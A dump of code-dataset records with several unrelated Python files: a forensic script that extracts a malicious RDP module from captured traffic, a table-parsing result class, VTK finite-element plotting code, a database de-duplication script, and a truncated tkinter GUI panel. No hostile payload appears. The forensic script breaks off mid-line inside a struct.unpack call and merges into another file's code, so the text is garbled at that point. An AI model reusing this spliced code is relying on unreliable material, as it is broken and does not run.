\n\n","repo_name":"apachefranklin/face-recognition","sub_path":"recognition/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34863387817","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see <https://www.gnu.org/licenses/>.\n\n# This script extracts the malicious RDP module from the traffic\n\nimport re, struct, zlib\n\nFILENAME = 'traffic/kernel_traffic_dump.bin'\nOUT_FILENAME = 'traffic/rd_restored.bin'\nFILTER = rb'\\x42\\x49\\x4E\\x53'\nHEADER_SZ = 16\n\ndef get_hash(pp: bytes) -> int:\n hash = 0\n for i in range(len(pp)):\n hash += pp[i]\n return hash\n\nstream = b''\nwith open(FILENAME, 'rb') as f:\n stream = f.read()\n\nmatches = re.search(FILTER, stream)\noffset = matches.start()\n\nexcepted_hash = None\nexcepted_sz = None\ntotal_hash = 0\nconstructed_rd = b''\nwhile offset < len(stream):\n magic, pkt_sz, payload_sz, pkt_type = struct.unpack(b' 10:\n command, total_sz, curr_sz = struct.unpack(b' bool:\n \"\"\"\n\n Returns:\n bool. True if the row on which the condition evaluated to True should be excluded\n from the result.\n \"\"\"\n return not self.is_inclusive\n\n @classmethod\n def good(cls, should_terminate: bool,\n is_inclusive: bool) -> 'TableEndConditionResult':\n \"\"\"Good TableEndConditionResult\n\n Args:\n should_terminate (bool):\n is_inclusive (bool):\n\n Returns:\n TableEndConditionResult\n \"\"\"\n return TableEndConditionResult(\n should_terminate=should_terminate,\n is_inclusive=is_inclusive,\n is_ok=True\n )\n\n @classmethod\n def bad(\n cls,\n msg: str = '',\n exception: Optional[Exception] = None) -> 'TableEndConditionResult':\n \"\"\"Bad TableEndConditionResult\n\n Args:\n msg (str):\n exception ():\n\n Returns:\n TableEndConditionResult\n \"\"\"\n return TableEndConditionResult(\n should_terminate=True,\n is_inclusive=False,\n is_ok=False,\n msg=msg,\n exception=exception\n )\n","repo_name":"thegangtechnology/exco","sub_path":"src/exco/extractor/table_end_conditions/table_end_condition_result.py","file_name":"table_end_condition_result.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"25812048915","text":"# -*- coding: utf-8 -*-\n''' Graphics of the finite element model.\n'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. 
Pérez Tato (LCPT) , Ana Ortega (AO_O) \"\n__copyright__= \"Copyright 2016, LCPT, AO_O\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@ciccp.es, ana.ortega@ciccp.es \"\n\nimport sys\nimport vtk\nfrom misc_utils import log_messages as lmsg\nimport xc_base\nfrom misc.vtk_utils import utils_vtk\nfrom postprocess.xcVtk import vtk_graphic_base\nfrom postprocess.xcVtk.fields import fields\nfrom postprocess.xcVtk.fields import local_axes_vector_field as lavf\nfrom postprocess.xcVtk.CAD_model import create_array_set_data\nimport random as rd \nimport xc\n\nclass DisplaySettingsFE(vtk_graphic_base.DisplaySettings):\n ''' Define the parameters to configure the output for\n displaying the finite element mesh.\n '''\n def __init__(self):\n super(DisplaySettingsFE,self).__init__()\n self.nodes= None\n self.gridMapper= None\n \n def VtkDefineElementsActor(self, reprType, field: fields.ScalarField,color=xc.Vector([rd.random(),rd.random(),rd.random()])):\n ''' Define the actor to display elements\n\n :param reprType: type of representation (\"points\", \"wireframe\" or\n \"surface\")\n :param field: scalar field to be represented.\n :param color: RGB color to represent the elements (defaults to random\n color)\n '''\n if(field):\n field.setupOnGrid(self.gridRecord.uGrid)\n self.gridMapper= vtk.vtkDataSetMapper()\n self.gridMapper.SetInputData(self.gridRecord.uGrid)\n if(field):\n field.setupOnMapper(self.gridMapper)\n elemActor= vtk.vtkActor()\n elemActor.SetMapper(self.gridMapper)\n elemActor.GetProperty().SetColor(color[0],color[1],color[2])\n\n if(reprType==\"points\"):\n elemActor.GetProperty().SetRepresentationToPoints()\n elif(reprType==\"wireframe\"):\n elemActor.GetProperty().SetRepresentationToWireFrame()\n elif(reprType==\"surface\"):\n elemActor.GetProperty().SetRepresentationToSurface()\n else:\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.error(className+'.'+methodName+\"; Representation type: '\"+ reprType+ \"' unknown.\")\n self.renderer.AddActor(elemActor)\n if(field):\n field.creaColorScaleBar()\n self.renderer.AddActor2D(field.scalarBar)\n\n def VtkDefineNodesActor(self, radius):\n '''Define the actor to display nodes.\n\n :param radius: radius of the sphere used as symbol to represent nodes.\n '''\n sphereSource= vtk.vtkSphereSource()\n sphereSource.SetRadius(radius)\n sphereSource.SetThetaResolution(5)\n sphereSource.SetPhiResolution(5)\n\n markNodes= vtk.vtkGlyph3D()\n markNodes.SetInputData(self.gridRecord.uGrid)\n markNodes.SetSourceData(sphereSource.GetOutput())\n markNodes.ScalingOff()\n markNodes.OrientOff()\n\n mappNodes= vtk.vtkPolyDataMapper()\n mappNodes.SetInputData(markNodes.GetOutput())\n visNodes= vtk.vtkActor()\n visNodes.SetMapper(mappNodes)\n visNodes.GetProperty().SetColor(rd.random(),rd.random(),rd.random())\n self.renderer.AddActor(visNodes)\n\n def VtkLoadElemMesh(self, field: fields.ScalarField, defFScale=0.0,eigenMode=None):\n '''Load the element mesh\n\n :param field: scalar field to be represented\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. In case of modal analysis, the displayed \n position of each node equals to the initial position plus\n its eigenVector multiplied by this factor.\n (Defaults to 0.0, i.e. 
display of initial/undeformed shape)\n :param eigenMode: eigenvibration mode if we want to display the \n deformed shape associated with it when a modal \n analysis has been carried out. \n Defaults to None: no modal analysis.\n '''\n # Define grid\n self.nodes= vtk.vtkPoints()\n self.gridRecord.uGrid= vtk.vtkUnstructuredGrid()\n self.gridRecord.uGrid.SetPoints(self.nodes)\n eSet= self.gridRecord.xcSet\n eSet.numerate()\n self.gridRecord.uGrid.name= eSet.name+'_grid'\n # Scalar values.\n nodeSet= eSet.nodes\n numNodes= len(nodeSet)\n if(numNodes>0):\n if(field):\n arr= field.fillArray(nodeSet)\n if(__debug__):\n if(not arr):\n AssertionError('Can\\'t create the array.')\n field.creaLookUpTable() \n # Load nodes in vtk\n if eigenMode is None:\n for n in nodeSet:\n pos= n.getCurrentPos3d(defFScale)\n self.nodes.InsertPoint(n.getIdx,pos.x,pos.y,pos.z)\n else:\n for n in nodeSet:\n pos= n.getEigenPos3d(defFScale,eigenMode)\n self.nodes.InsertPoint(n.getIdx,pos.x,pos.y,pos.z)\n # Load elements in vtk\n setElems= eSet.elements\n for e in setElems:\n vertices= xc_base.vector_int_to_py_list(e.getIdxNodes)\n vtx= vtk.vtkIdList()\n for vIndex in vertices:\n vtx.InsertNextId(vIndex)\n if(e.getVtkCellType!= vtk.VTK_VERTEX):\n self.gridRecord.uGrid.InsertNextCell(e.getVtkCellType,vtx)\n setConstraints= eSet.getConstraints\n for c in setConstraints:\n if(hasattr(c,'getIdxNodes')):\n vertices= xc_base.vector_int_to_py_list(c.getIdxNodes)\n vtx= vtk.vtkIdList()\n for vIndex in vertices:\n vtx.InsertNextId(vIndex)\n if(c.getVtkCellType!= vtk.VTK_VERTEX):\n self.gridRecord.uGrid.InsertNextCell(c.getVtkCellType,vtx)\n return True\n else:\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+\"; error when drawing set: '\"+eSet.name+\"', it has no nodes so I can't get set geometry (use fillDownwards?)\")\n return False\n \n \n\n def defineMeshScene(self, field: fields.ScalarField, defFScale= 0.0, eigenMode= None, color= xc.Vector([rd.random(),rd.random(),rd.random()])):\n '''Define the scene for the mesh\n\n :param field: scalar field to be represented\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n :param eigenMode: eigenvibration mode if we want to display the \n deformed shape associated with it when a modal \n analysis has been carried out. 
\n Defaults to None: no modal analysis.\n :param color: RGB color to represent the elements (defaults to random\n color)\n '''\n retval= self.VtkLoadElemMesh(field, defFScale, eigenMode)\n self.renderer= vtk.vtkRenderer()\n self.renderer.SetBackground(self.bgRComp,self.bgGComp,self.bgBComp)\n self.VtkDefineNodesActor(0.002)\n self.VtkDefineElementsActor(\"surface\", field, color)\n self.renderer.ResetCamera()\n return retval\n\n #Implement labels.\n # if(self.gridRecord.entToLabel==\"elementos\"):\n # VtkDisplayIdsElements(self.renderer)\n # elif(self.gridRecord.entToLabel==\"nodes\"):\n # vtk_define_mesh_nodes.VtkDisplayIdsNodes(self.renderer)\n # else:\n # print(\"Entity: \", self.gridRecord.entToLabel, \" unknown.\")\n\n def FEmeshGraphic(self,setToDisplay,caption= '',cameraParameters= vtk_graphic_base.CameraParameters('XYZPos'),defFScale=0.0):\n ''' Graphic of the FE mesh\n\n :param setToDisplay: XC set of elements to be displayed\n :param caption: text to write in the graphic\n :param cameraParameters: camera parameters (position, orientation,...).\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+'; FEmeshGraphic DEPRECATED use displayFEMesh.')\n self.cameraParameters= cameraParameters\n self.displayFEMesh(setToDisplay,caption,defFScale)\n\n def displayFEMesh(self, setToDisplay, caption= '', defFScale=0.0):\n ''' Graphic of the FE mesh\n\n :param setToDisplay: XC set of elements to be displayed.\n :param caption: text title to write in the graphic.\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n self.setupGrid(setToDisplay)\n self.defineMeshScene(field= None)\n self.displayScene(caption= caption)\n \n def displayLocalAxes(self,setToDisplay,caption= 'local axis', vectorScale=1.0, fileName= None, defFScale= 0.0):\n '''Display the element local axes.\n\n :param setToDisplay: set of elements to be displayed (defaults to total set)\n :param caption: text to display in the graphic \n :param vectorScale: factor to apply to the vectors length in the representation\n :param fileName: file name to store the image. If none -> window on screen.\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. 
display of \n initial/undeformed shape)\n '''\n self.setupGrid(setToDisplay)\n elementAvgSize= setToDisplay.elements.getAverageSize(False)\n LrefModSize= setToDisplay.getBnd(defFScale).diagonal.getModulus()\n vScale= vectorScale*min(elementAvgSize, .15*LrefModSize) \n vField= lavf.LocalAxesVectorField(setToDisplay.name+'_localAxes',vScale)\n vField.dumpVectors(setToDisplay)\n self.defineMeshScene(field= None) \n vField.addToDisplay(self)\n self.displayScene(caption, fileName)\n\n def displayStrongWeakAxis(self, setToDisplay, caption= 'strong [red] and weak [blue] axes', vectorScale=1.0):\n '''Display the strong [red] and weak [blue] axes of the elements in the chosen set\n\n :param setToDisplay: set of elements to be displayed (defaults to total set)\n :param caption: text to display in the graphic \n :param vectorScale: factor to apply to the vectors length in the representation\n '''\n self.setupGrid(setToDisplay)\n vField= lavf.StrongWeakAxisVectorField(setToDisplay.name+'_strongWeakAxis',vectorScale)\n vField.dumpVectors(setToDisplay)\n self.defineMeshScene(field= None) \n vField.addToDisplay(self)\n self.displayScene(caption)\n\n def defineMeshActorsSet(self, elemSet, field: fields.ScalarField, defFScale, nodeSize):\n ''' Define mesh\n\n :param elemSet: set of elements that form the mesh to display.\n :param field: scalar field to be represented\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n :param nodeSize: size of the spheres that represent nodes.\n '''\n self.setupGrid(elemSet)\n if elemSet.color.Norm()==0:\n elemSet.color=xc.Vector([rd.random(),rd.random(),rd.random()])\n self.VtkLoadElemMesh(field,defFScale,eigenMode=None)\n self.VtkDefineNodesActor(nodeSize)\n self.VtkDefineElementsActor(\"surface\", field, elemSet.color)\n\n def displayMesh(self, xcSets, field: fields.ScalarField = None, diagrams= None, caption= '',fileName= None, defFScale=0.0, nodeSize=0.01, scaleConstr= 0.2):\n '''Display the finite element mesh \n\n :param xcSets: set or list of sets to be displayed\n :param field: scalar field to show (optional)\n :param diagrams: diagrams to show (optional)\n :param caption: text to display in the graphic.\n :param fileName: name of the graphic file to create (if None -> screen window).\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. 
display of \n initial/undeformed shape)\n :param nodeSize: size of the spheres that represent nodes (defaults to\n 0.01)\n :param scaleConstr: scale of SPConstraints symbols (defaults to 0.2)\n '''\n self.renderer= vtk.vtkRenderer()\n self.renderer.SetBackground(self.bgRComp,self.bgGComp,self.bgBComp)\n if(type(xcSets)==list):\n for s in xcSets:\n self.defineMeshActorsSet(s, field, defFScale, nodeSize)\n self.displaySPconstraints(s, scaleConstr, defFScale)\n else:\n self.defineMeshActorsSet(xcSets, field, defFScale, nodeSize)\n self.displaySPconstraints(xcSets, scaleConstr, defFScale)\n self.renderer.ResetCamera()\n if(diagrams):\n for d in diagrams:\n self.appendDiagram(d)\n self.displayScene(caption,fileName)\n\n def displayLoadOnNode(self, nod, color, force, moment, fScale,defFScale=0.0):\n '''Display loads on one node\n\n :param nod: node instance\n :param color: color\n :param force: force (displayed as a single arrow)\n :param moment: moment (displayed as a double arrow)\n :param fScale: scaling factor (forces and moments)\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n #actorName= baseName+\"%04d\".format(nod.tag) # Node tag.\n pos= nod.getCurrentPos3d(defFScale)\n absForce= force.Norm()\n if(absForce>1e-6):\n utils_vtk.drawVtkSymb('arrow',self.renderer,color,pos,force,fScale*absForce)\n absMoment= moment.Norm()\n if(absMoment>1e-6):\n utils_vtk.drawVtkSymb('doubleArrow',self.renderer,color,pos,moment,fScale*absMoment)\n\n def displayNodalLoads(self, preprocessor, loadPattern, color, fScale):\n '''Display the all nodal loads defined in a load pattern\n\n :param preprocessor: preprocessor\n :param loadPattern: load pattern\n :param color: color of the symbols (arrows)\n :param fScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. 
display of \n initial/undeformed shape)\n '''\n loadPattern.addToDomain()\n #loadPatternName= loadPattern.getProp(\"dispName\")\n lIter= loadPattern.loads.getNodalLoadIter\n load= lIter.next()\n while not(load is None):\n #actorName= \"flecha\"+loadPatternName+'{:04d}'.format(load.tag) # Tag force.\n nodeTag= load.getNodeTag\n node= preprocessor.getNodeHandler.getNode(nodeTag)\n force= load.getForce\n moment= load.getMoment\n self.displayLoadOnNode(node, color, force, moment,fScale) \n load= lIter.next()\n loadPattern.removeFromDomain()\n\n\n def displayElementPunctualLoad(self, preprocessor, pLoad,loadPattern, renderer, color, force, fScale):\n '''Display punctual loads on elements\n '''\n xForce= pLoad.getElems()\n eleTags= pLoad.elementTags\n loadPatternName= loadPattern.getProp(\"dispName\")\n actorName= \"flechaP\"+loadPatternName+'{:04d}'.format(pLoad.tag) # Tag force.\n for tag in eleTags:\n ele= preprocessor.getElementHandler.getElement(tag)\n actorName+= '{:04d}'.format(tag) # element identifier.\n pos= ele.point(xForce)\n utils_vtk.drawVtkSymb('arrow',self.renderer,color,pos,force,fScale)\n\n def displayElementUniformLoad(self, preprocessor, unifLoad,loadPattern, color, force, fScale):\n loadPatternName= loadPattern.getProp(\"dispName\")\n actorName= \"flechaU\"+loadPatternName+'{:04d}'.format(unifLoad.tag)\n eleTags= unifLoad.elementTags\n for tag in eleTags:\n # ele= preprocessor.getElementHandler.getElement(tag)\n actorName+= '{:04d}'.format(tag) # element identifier.\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.error(className+'.'+methodName+'; displayElementUniformLoad not implemented.')\n # points= ele.getPoints(3,1,1,True)\n # i= 0\n # for capa in points:\n # for pos in capa: \n # print(pos)\n # utils_vtk.drawArrow(self.renderer,color,pos,force,fScale*force.Norm())\n # i+= 1\n\n def displayElementalLoads(self, preprocessor,loadPattern, color, fScale):\n # loadPattern.addToDomain()\n # eleLoadIter= loadPattern.loads.getElementalLoadIter\n # eleLoad= eleLoadIter.next()\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.error(className+'.'+methodName+'; displayElementalLoads not implemented.')\n # while not(eleLoad is None):\n # force= eleLoad.getGlobalForces()\n # category= eleLoad.category\n # if(category==\"uniform\"):\n # self.displayElementUniformLoad(preprocessor, eleLoad,loadPattern,color,force,fScale)\n # else:\n # self.displayElementPunctualLoad(preprocessor, eleLoad,loadPattern,color,force,fScale)\n # loadPattern.removeFromDomain()\n\n def displayLoads(self, preprocessor, loadPattern):\n clrVectores= loadPattern.getProp(\"color\")\n fScaleVectores= loadPattern.getProp(\"scale\")\n self.displayElementalLoads(preprocessor, loadPattern, clrVectores, fScaleVectores)\n self.displayNodalLoads(preprocessor, loadPattern,clrVectores,fScaleVectores)\n\n def appendDiagram(self,diagram,orientScbar=1,titleScbar=None):\n '''\n :param orientScbar: orientation of the scalar bar (defaults to 1-horiz)\n :param titleScbar: title for the scalar bar (defaults to None)\n '''\n diagram.addDiagramToScene(self,orientScbar,titleScbar)\n\n def displaySPconstraints(self, setToDisplay, scale, defFScale=0.0):\n ''' Display single point constraints.\n\n :param setToDisplay: set to be displayed\n :param scale: scale for SPConstraints symbols.\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n 
by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n prep= setToDisplay.getPreprocessor\n nodInSet= setToDisplay.nodes.getTags()\n elementAvgSize= setToDisplay.elements.getAverageSize(False)\n LrefModSize= setToDisplay.getBnd(defFScale).diagonal.getModulus()\n cScale= scale*min(elementAvgSize, .15*LrefModSize)\n #direction vectors for each DOF\n vx,vy,vz=[1,0,0],[0,1,0],[0,0,1]\n DOFdirVct=(vx,vy,vz,vx,vy,vz)\n spIter= prep.getDomain.getConstraints.getSPs\n sp= spIter.next()\n while sp:\n nod= sp.getNode\n if nod.tag in nodInSet:\n dof= sp.getDOFNumber\n if dof < 3: # This is not true in 2D problems.\n utils_vtk.drawVtkSymb(symbType='cone',renderer=self.renderer, RGBcolor=[0,0,1], vPos=nod.getInitialPos3d, vDir=DOFdirVct[dof], scale= cScale)\n else:\n utils_vtk.drawVtkSymb(symbType='shaftkey',renderer=self.renderer, RGBcolor=[0,1,0], vPos=nod.getInitialPos3d, vDir=DOFdirVct[dof], scale= cScale)\n sp= spIter.next()\n return\n \ndef VtkLoadIdsNodes(recordGrid):\n '''Load node labels. Not yet implemented.'''\n nodeLabels= create_array_set_data.VtkCreaStrArraySetData(recordGrid.setName,\"nodes\",\"etiqNod\",\"tag\")()\n if(__debug__):\n if(not nodeLabels):\n AssertionError('Can\\'t create the labels.')\n recordGrid.GetPointData().SetStrings('etiqNod')\n\ndef VtkDisplayIdsNodes(recordGrid, renderer):\n '''Display node labels (not implemented yet)'''\n ids= vtk.vtkIdFilter()\n ids.SetInput(recordGrid.uGrid)\n ids.CellIdsOff()\n ids.PointIdsOff()\n\n VtkLoadIdsNodes(recordGrid)\n\n visPts= vtk.vtkSelectVisiblePoints()\n visPts.SetInput(\"ids\")\n visPts.SetRenderer(renderer)\n visPts.SelectionWindowOff()\n\n #Create the mapper to display the point ids. Specify the format to\n # use for the labels. Also create the associated actor.\n ldm= vtk.vtkLabeledShStrMapper()\n ldm.SetInput(\"visPts\")\n ldm.LabelTextProperty().SetColor(0.1,0.1,0.1)\n nodeLabels= vtk.vtkActor2D().SetMapper(ldm)\n renderer.AddActor2D(nodeLabels)\n\ndef VtkDisplayIdsElements(ids):\n '''Display element labels. Not implemented yet.'''\n cc= vtk.vtkCellCenters()\n vtk.SetInput(ids) # Cell centroids. \n\n visCells= vtk.vtkSelectVisiblePoints()\n visCells.SetInput(cc)\n visCells.SetRenderer(\"renderer\")\n visCells.SelectionWindowOff()\n\n #Create the mapper to display the cell ids. Specify the format to\n # use for the labels. 
Also create the associated actor.\n\n cellMapper= vtk.vtkLabeledShStrMapper\n cellMapper.SetInput(visCells)\n cellMapper.LabelTextProperty().SetColor(0,0,0.9)\n\n cellLabels= vtk.vtkActor2D()\n cellLabels.SetMapper(cellMapper)\n","repo_name":"xcfem/xc","sub_path":"python_modules/postprocess/xcVtk/FE_model/vtk_FE_graphic.py","file_name":"vtk_FE_graphic.py","file_ext":"py","file_size_in_byte":23497,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"25103018888","text":"import pyodbc\nfrom sqlalchemy import create_engine\nimport pandas as pd\nfrom app import config\n\nserver = config['server']\nbd = config['bd']\nusuario = config['usuario']\ncontrasena = config['contrasena']\n\ntry:\n conexion = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL server}; SERVER='+server+'; DATABASE='+bd+'; UID='+usuario+';PWD='+contrasena)\n cur = conexion.cursor()\n print(\"conexion exitosa\")\nexcept Exception as ex:\n print(ex)\n\ncur.execute(\"select fecha, nombre_local, tamanio, sabor from registro_tortelin group by fecha, nombre_local, tamanio, sabor having count(*) > 1\")\nduplicados = cur.fetchall()\nprint(duplicados)\n\nfor fecha, local, tamaño, sabor in duplicados:\n print(fecha, local, tamaño, sabor)\n cur.execute(\"select unidades_vendidas, unidades_desechadas, precio_dia from registro_tortelin where nombre_local= ? and tamanio = ? and sabor = ? and fecha = ?\", local, tamaño, sabor, fecha)\n duplicado = cur.fetchall()\n print(duplicado)\n univend = duplicado[0][0] + duplicado[1][0]\n unidesech = duplicado[0][1] + duplicado[1][1]\n if duplicado[0][0] == duplicado[0][1] and duplicado[0][1] == duplicado[1][1] and duplicado[0][2] == duplicado[1][2]:\n print(\"completamente iguales\")\n else:\n if duplicado[0][2] > duplicado[1][2]:\n precio = duplicado[0][2]\n cur.execute(\"update registro_tortelin set unidades_vendidas = ?, unidades_desechadas = ? where nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", univend, unidesech, local, tamaño, sabor, fecha, precio)\n cur.execute(\"delete from registro_tortelin where unidades_vendidas = ? and unidades_desechadas = ? and nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", duplicado[1][0], duplicado[1][1], local, tamaño, sabor, fecha, duplicado[1][2])\n conexion.commit()\n else:\n precio = duplicado[1][2]\n cur.execute(\"update registro_tortelin set unidades_vendidas = ?, unidades_desechadas = ? where nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", univend, unidesech, local, tamaño, sabor, fecha, precio)\n cur.execute(\"delete from registro_tortelin where unidades_vendidas = ? and unidades_desechadas = ? and nombre_local=? and tamanio =? and sabor = ? and fecha = ? 
and precio_dia = ?;\", duplicado[0][0], duplicado[0][1], local, tamaño, sabor, fecha, duplicado[0][2])\n conexion.commit() \n\n\ncur.execute(\"EXEC ELIMINAR_REGISTROS;\")\nconexion.commit()","repo_name":"24Ours/ETL_Python_Tortelin","sub_path":"eliminar_duplicados.py","file_name":"eliminar_duplicados.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22191158277","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 13 09:18:34 2022\n\n@author: sp3660\n\"\"\"\nimport matplotlib as mpl\nimport os\nimport tkinter as tk\nfrom tkinter import Canvas,END, Label, RAISED, Text, WORD, StringVar, Button, ttk, Listbox, Scrollbar\nfrom tkinter import ttk\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nfrom project_manager.ProjectManager import ProjectManager\ntry :\n from .scrollbarFrame import ScrollbarFrame\nexcept:\n from scrollbarFrame import ScrollbarFrame\nimport time\n\nimport numpy as np\nimport shutil\nimport sys\nfrom pprint import pprint\nmpl.rcParams['axes.prop_cycle'] = mpl.cycler(color=[\"k\", \"r\", \"b\",'g','y','c','m', 'tab:brown']) \n\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['ps.fonttype'] = 42\nmpl.rcParams['font.family'] = 'Arial'\n\n#%% class definition\nclass ImagingSessionPanel(tk.Toplevel):\n def __init__(self, gui, session_date=None, datamanaging=None):\n tk.Toplevel.__init__(self, gui) #inst\n if datamanaging:\n self.datamanaging=datamanaging\n elif gui:\n self.gui_ref=gui \n self.datamanaging=self.gui_ref.datamanaging\n self.geometry(\"+2555+0\")\n self.session_date=session_date\n#%%'Imaging Session' \n # self.vmax_default=1\n # self.vmax=self.vmax_default\n self.frames_names=['Session Info Frame',\n 'Acquisition Frame', \n # 'Message Box'\n ]\n self.frames={}\n for i in range(len(self.frames_names)):\n self.frames[self.frames_names[i]]=ttk.Frame(self, borderwidth = 4, relief='groove')\n \n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=2)\n self.grid_rowconfigure(1, weight=3)\n # self.grid_rowconfigure(2, weight=1)\n\n \n self.frames[self.frames_names[0]].grid(row=0, column=0, sticky=\"nswe\") \n self.frames[self.frames_names[1]].grid(row=1, column=0, sticky=\"nswe\") \n # self.frames[self.frames_names[2]].grid(row=2, column=0, sticky=\"nswe\") \n\n\n \n#%%'Imaging Session Info Frame' \n \n self.frame1=self.frames[self.frames_names[0]]\n \n self.frame1.frames_names=['Selections Frame',\n 'Metadata-Info Frame', \n 'Widefield Frame'\n ]\n self.frame1.frames={}\n for i in range(len(self.frame1.frames_names)):\n self.frame1.frames[self.frame1.frames_names[i]]=ttk.Frame(self.frame1, borderwidth = 4, relief='groove')\n \n self.frame1.grid_columnconfigure(0, weight=2)\n self.frame1.grid_columnconfigure(1, weight=1)\n self.frame1.grid_columnconfigure(2, weight=3)\n self.frame1.grid_rowconfigure(0, weight=1)\n self.frame1.grid_rowconfigure(1, weight=1)\n\n \n self.frame1.frames[self.frame1.frames_names[0]].grid(row=0, column=0, sticky=\"nswe\") \n self.frame1.frames[self.frame1.frames_names[1]].grid(row=0, column=1, sticky=\"nswe\") \n self.frame1.frames[self.frame1.frames_names[2]].grid(row=0, column=2, sticky=\"nswe\") \n\n \n \n#%%'Imaging Session Info Frame SELECTIONS frame' \n\n self.frame1.frame1=self.frame1.frames[self.frame1.frames_names[0]]\n \n 
self.frame1.frame1.litbox_names=['Mouse_selection', \n 'acquisition_selection', \n 'dataset_selection1',\n 'dataset_selection2',\n 'dataset_selection3',\n 'dataset_selection4'\n ]\n\n self.frame1.frame1.listboxes={}\n self.frame1.frame1.listbox_variables={}\n self.frame1.frame1.scrollbar ={}\n \n for i, litbox_name in enumerate(self.frame1.frame1.litbox_names):\n self.frame1.frame1.listbox_variables[litbox_name]=StringVar() \n self.frame1.frame1.listboxes[litbox_name]=Listbox(self.frame1.frame1, listvariable=self.frame1.frame1.listbox_variables[litbox_name], width=10, height=10, exportselection=0)\n self.frame1.frame1.scrollbar [litbox_name]= Scrollbar(self.frame1.frame1) \n self.frame1.frame1.listboxes[litbox_name].config(yscrollcommand = self.frame1.frame1.scrollbar [litbox_name].set)\n self.frame1.frame1.scrollbar [litbox_name].config(command = self.frame1.frame1.listboxes[litbox_name].yview)\n \n self.get_mouse_imaged() \n self.get_all_objects()\n\n \n self.frame1.frame1.listboxes[ self.frame1.frame1.litbox_names[0]].bind('<<ListboxSelect>>', self.get_mouse_info_and_data)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[1]].bind('<<ListboxSelect>>', self.get_acquisition_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[2]].bind('<<ListboxSelect>>', self.get_dataset_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[3]].bind('<<ListboxSelect>>', self.get_dataset_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[4]].bind('<<ListboxSelect>>', self.get_dataset_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[5]].bind('<<ListboxSelect>>', self.get_dataset_info)\n\n\n\n\n for i, litbox in enumerate(self.frame1.frame1.listboxes.values()):\n if i==0:\n litbox.grid(column=0, row=0)\n elif i==1:\n litbox.grid(column=0, row=1)\n elif i==2:\n litbox.grid(column=1, row=0)\n elif i==3:\n litbox.grid(column=1, row=1) \n elif i==4:\n litbox.grid(column=1, row=2)\n elif i==5:\n litbox.grid(column=1, row=3) \n\n\n # self.frame1.frame1.buttons={}\n # self.frame1.frame1.buttons_names=['Open acquisition directory',\n # 'Switch tomato(if 3plane ac)', \n # 'Open dataset directory'\n # ]\n # self.frame1.frame1.buttons_commands=[self.open_directory_button, \n # self.switch_red_button,\n # self.open_dataset_button,\n # ] \n # for i, butt in enumerate( self.frame1.frame1.buttons_names):\n # 